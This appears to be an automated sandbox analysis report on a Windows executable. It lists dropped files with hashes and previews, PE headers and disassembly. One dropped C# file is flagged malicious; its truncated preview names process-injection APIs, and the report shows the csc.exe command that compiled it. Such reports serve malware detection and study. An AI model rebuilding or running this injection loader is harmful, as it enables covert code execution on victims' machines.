                                                                                                                                                                                                              SSDEEP:1536:DSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:DapaQK0yfOD8F31Xw
                                                                                                                                                                                                              MD5:29CC7030CB74F5A362B80232D9BD6712
                                                                                                                                                                                                              SHA1:922F474C35932112D2D9F2F222427FB1945ACEB9
                                                                                                                                                                                                              SHA-256:49E319DF3CBA4481E15B4CC2DD387F45B0F730EBA8088480695B5BE2A8EF5BC2
                                                                                                                                                                                                              SHA-512:6949F18DBCD47F8F2420345B38A14F39DD15CBD148CFC02F58EE7E1AAED3D5A3323E46FBADD4E0A19A927DD490CEDAB5973E4A54E9AA68FA0F9044373662DD13
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..Q.... ................p..*9...y........................0..........|).*7...|}.h.2...........................).*9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g......................................................................................................................................................................................................................................!m<*7...|} .................>..*7...|}..........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                              Entropy (8bit):0.08037081319821053
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:m9sMoWDXsBj4i4uRFE5/ll/SYXallo0lJlbxvws:mdqj3LRi5/llKYeL
                                                                                                                                                                                                              MD5:CA14724D949F1B4020BB3E5DC89D6A1A
                                                                                                                                                                                                              SHA1:C31EB32485149042B0541D6631A00CCCEDD406A3
                                                                                                                                                                                                              SHA-256:F28B9531DA5D986EDA27BD02D1CD3EE38AD80CBD4B9B994A10D423665AB2B1F8
                                                                                                                                                                                                              SHA-512:F09DEBC525E4AFA9054866E45CC1775A1EFE5712C214C885E2352F32445DB82D5432DD21795AB69C01ED2B2969FBC387404ACCF265754B11E0E00271F1009C96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:7.._....................................*9...y..*7...|}......|)..............|)......|)..C.t.....|)O.................>..*7...|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Nov 7 16:55:12 2024, 1st section name ".debug$S"
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1332
                                                                                                                                                                                                              Entropy (8bit):3.994879980324705
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:HdFzW91vMAhp51H+wK1mNII+ycuZhN+akS2PNnqS2d:iMOj9K1mu1ul+a3KqSG
                                                                                                                                                                                                              MD5:C8B93A24B9E33FD7BF9C0DA6A7179C3E
                                                                                                                                                                                                              SHA1:5BBF0799B81C2BC9D94215FA191B3CB275FBFFF0
                                                                                                                                                                                                              SHA-256:C65F8DF390B31B77ADEA935BA3C984D3968D7049B9946768C2BA145F87416581
                                                                                                                                                                                                              SHA-512:50375A5D54ED920E44B1E7418FB7BD9E1264FF6AEF113F9B8BF9E9EBFF0F8BAD708B1DF87451FF6B0601510A01CB2E153864F0A854FB98B405FFC5C98538950D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:L.....,g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP................o....2"4.n..7..........5.......C:\Users\user\AppData\Local\Temp\RES267D.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                              Entropy (8bit):3.0906852296362803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfYak7YnqqSNPN5Dlq5J:+RI+ycuZhN+akS2PNnqX
                                                                                                                                                                                                              MD5:CEBA6F181FEB19322234B36EC8828237
                                                                                                                                                                                                              SHA1:9B12FEF0311B900F07817130F92E738C957D2F5C
                                                                                                                                                                                                              SHA-256:58E2766BD83CF9FD353D92382D20A7B3F1AF2D4F2A9021AAFC9B3AC1439928D7
                                                                                                                                                                                                              SHA-512:1F015F1636355940BCC84E4B058DDD4BF5FAA42D902BB393409757BD0A547E7A26731E006E8B9EA59C14AD400E7460EBB4C5A91E6F7335E10DB90A318822CB2F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10583
                                                                                                                                                                                                              Entropy (8bit):4.487855797297623
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                                                                                                                                                                              MD5:B022C6FE4494666C8337A975D175C726
                                                                                                                                                                                                              SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                                                                                                                                                                              SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                                                                                                                                                                              SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                              Entropy (8bit):4.973421176531178
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:pAu+H2L/6K2CN23fUvRJzxszICN23fUvR0:p37L/6KmMvRJNMvR0
                                                                                                                                                                                                              MD5:833C703A20DD1567D05F3207FEC34356
                                                                                                                                                                                                              SHA1:45D3AC2BEA2EC405EC738E42F3C9138EB136851F
                                                                                                                                                                                                              SHA-256:60C4AF82E652462F924EA7AAD3B0D580A36B5B5E55045627C5CFCC7AF612A2EB
                                                                                                                                                                                                              SHA-512:F0CAE768E5ACDE72636F7DBBCE4114B1857F37BBD4079BD0F817724D423F87D7B1C1CE9C370BD87C49F09AA599098E1D500102CC85356A4392AF94FB36B710CE
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs"
                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8704
                                                                                                                                                                                                              Entropy (8bit):4.661136452774683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:CbuaQZGQf9xPQ2pCa/u67hHJ09IhbpPrjzKcaEZRcH0ljILHqrv5Mq6TTzeNc+iZ:CCaQHf9WDa/u6NRj2caXUxd5MqMeNcd
                                                                                                                                                                                                              MD5:139A47B3FFBDC96404BE71BB5D1A9862
                                                                                                                                                                                                              SHA1:C5E9B4846270200668AC4249EC6036F7D5597636
                                                                                                                                                                                                              SHA-256:707885AFAC0EB28489B87DBE3159A43749BFDC94720D745EC997832F4CA02692
                                                                                                                                                                                                              SHA-512:9EB1C21A5FCD9503F2C5158D4EB61596FD328551C1A0EC6FF1650D164E2C282897E22B00F0610F037B59EC613EAD1EB578BC995F24A778F7EE0F27A8109CAFDA
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):707
                                                                                                                                                                                                              Entropy (8bit):5.238510208317859
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Kg/IR37L/6KmMvRJNMvRBKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KSIdn6KmMdMLKax5DqBVKVrdFAMBJTH
                                                                                                                                                                                                              MD5:9EE1B34B7BA93604E97A4DEB7050C14E
                                                                                                                                                                                                              SHA1:54ABE6DB2F22085E6F2D000317C0994B6A3F037E
                                                                                                                                                                                                              SHA-256:57590C93D428D89D1FA6685FC3B6353A1AB6F7931E484385EB3AB5AFCF4C4DA6
                                                                                                                                                                                                              SHA-512:92A9446E684237ECCB16DB728CD0AC7BD3605FC96222D117BE4C3763AEFDC6E4588E35FB5C5DEA1144FD51F531C03E558F9D1890E797A248C7FA2D4F45B702D4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (810)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):815
                                                                                                                                                                                                              Entropy (8bit):5.164686503043141
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:hyJaME9VBHslgT1d1uawBuoBN2t2t2t2t2t2t2tomffffffo:h5MAVKlgJXwBuSNYYYYYYYomffffffo
                                                                                                                                                                                                              MD5:DBF64638654788F697F5074BEB269CBD
                                                                                                                                                                                                              SHA1:B4650D26513FC30E4C8E125133DCBB08E461B5FF
                                                                                                                                                                                                              SHA-256:2150EA1185789F2A99EED5FD80427CD4C10D620F14609858A7167FC67458B02D
                                                                                                                                                                                                              SHA-512:43AFD67EA2B859B1E7D5C57B583446F66924793B7A26317A4B017089BF25F24157F961D7FBFE18BDEFC8750AADB63291EE992C88838F96B21855180F30579AFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                              Preview:)]}'.["",["delta flight atlanta","buffalo bills keon coleman injury","deals black friday","chicago pd season 12","spacex launch","denver weather forecast snow totals","warriors vs celtics nba","mega millions winning numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):134075
                                                                                                                                                                                                              Entropy (8bit):5.4352986654014135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:i7C/VNgN7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgdCFlOve2dzAcJ82O:fE7vhSJjxeX431PBLx8OF9jfYsci2i6o
                                                                                                                                                                                                              MD5:AE04E2B18FF259CE3FDE85494FBA6367
                                                                                                                                                                                                              SHA1:809D8F449E9484C4A0D0BE472D8E6DB0B658E3CF
                                                                                                                                                                                                              SHA-256:4E8CEA7525FBB711989F8324E8D9834FD263DFB35C7ED18BC97DE5EDBF138DBF
                                                                                                                                                                                                              SHA-512:C1F3A9418EE0B73280F59FDB622AEF295EACE0C438F69362E934D25E3CB47F659E7F9CB259D6B000C846D01A08CB355797D4BF1A5D45D264A01B3413E4518AA1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):6.0688434230319475
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:7IXl1M9JGV.exe
                                                                                                                                                                                                              File size:122'368 bytes
                                                                                                                                                                                                              MD5:826ac9d03e37048df300b013335098d9
                                                                                                                                                                                                              SHA1:a1c6214e85b826b769d931a20434224e42da28c1
                                                                                                                                                                                                              SHA256:a0aeb837cb5e762fc0b7d657c71d343e765cccb5780cd315756f682418b3cdfe
                                                                                                                                                                                                              SHA512:60a4d7c9d1628040bdd08b01682cd5900c06f6b23a73877a4b60e3ef983733a5d27a33159306564f014269ba2984fe369e11ac86c27b0fe3906716f4bc187882
                                                                                                                                                                                                              SSDEEP:3072:ORIhf/ay4MQGyEDmGg9m5mZcErtLk0m/USg:vhf/ay4MQGAm5mZHV3b
                                                                                                                                                                                                              TLSH:53C36B1B73A530F8E1674238C8510A46EBB3B43647619FAF03B447A61F636D19E3EB61
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..n.W.n.W.n.W...V.n.W...VGn.W...V.n.W.n.W.n.W...V.n.W...V.n.W...V.n.W...V.n.W.n.W.n.W...V.n.W...W.n.W...V.n.WRich.n.W.......
                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                              Entrypoint:0x1400012b0
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                              Subsystem:windows cui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x672BB597 [Wed Nov 6 18:29:43 2024 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:398697f041e256fb6c451f1966f76316
                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                              call 00007F80B0CE7D8Ch
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                              jmp 00007F80B0CE7717h
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                              call dword ptr [00011D4Bh]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov ecx, ebx
                                                                                                                                                                                                              call dword ptr [00011D3Ah]
                                                                                                                                                                                                              call dword ptr [00011D44h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                                              mov edx, C0000409h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add esp, 20h
                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              jmp dword ptr [00011D38h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 38h
                                                                                                                                                                                                              mov ecx, 00000017h
                                                                                                                                                                                                              call dword ptr [00011D2Ch]
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007F80B0CE78A9h
                                                                                                                                                                                                              mov ecx, 00000002h
                                                                                                                                                                                                              int 29h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              lea ecx, dword ptr [0001C822h]
                                                                                                                                                                                                              call 00007F80B0CE7A6Eh
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov eax, dword ptr [esp+38h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov dword ptr [0001C909h], eax
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add eax, 08h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov dword ptr [0001C899h], eax
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov eax, dword ptr [0001C8F2h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov dword ptr [0001C763h], eax
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov dword ptr [0001C867h], eax
                                                                                                                                                                                                              mov dword ptr [0001C73Dh], C0000409h
                                                                                                                                                                                                              mov dword ptr [0001C737h], 00000001h
                                                                                                                                                                                                              mov dword ptr [0001C741h], 00000001h
                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1c31c0x28.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x1e0.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f0000x1134.pdata
